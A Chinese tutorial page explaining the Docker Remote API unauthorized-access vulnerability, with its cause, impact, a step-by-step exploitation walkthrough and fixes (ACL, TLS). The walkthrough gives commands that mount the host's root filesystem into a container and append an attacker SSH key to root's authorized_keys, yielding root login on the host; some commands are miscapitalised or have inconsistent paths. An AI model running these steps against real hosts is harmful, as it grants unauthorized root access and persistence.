栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

Docker

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

Docker

Docker_remote_api未授权访问漏洞 docker_remote_api简介:

docker remote api主要的目的是取代命令行界面,
docker client和docker daemon通过unix domain socket进行通信.
默认情况下,只有本机的root和docker组用户才能操作docker.

漏洞成因:
  1. dockerd -H unix:///var/run/docker. sock -H 0.0. 0.0:2375
  2. docker守护进程监听在0.0.0.0,外网可访问
  3. 没有使用iptable等限制可连接的来源ip。
漏洞危害:

可执行docker命令,获取敏感信息,获取docker镜像权限,获取镜像宿主机root权限。

漏洞利用:
  1. 远程对被攻击主机的docker容器进行操作
    docker -H tcp://x.x.x.x:2375 images

  2. 远程启动被攻击主机的docker容器,并且将该宿主机的根目录挂载到容器的/mnt目录下
    docker -H tcp://x.x.x.x:2375 run -it-v /:/mnt imageID /bin/bash

  3. 在攻击机生成密钥对,复制dockerapi.pub的内容
    Ssh-keygen -f dockerapi

  4. 进入/root/mnt/root/.ssh目录下,将dockerapi.pub的内容追加到authorized_keys中
    Cd /root/mnt/root/.ssh
    Echo 公钥内容 >> authorized_keys

  5. 在攻击机使用私钥登录宿主机
    Ssh -i dockerapi root@宿主机IP

修复方法:

1、设置ACL,只允许信任ip连接对应端口
2、开启TLS,使用生成的证书进行认证
修复参考链接:https://docs.docker.com/engine/security/https/

其他参考链接:
https://www.cnblogs.com/pythonal/p/9207696.html

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/324251.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号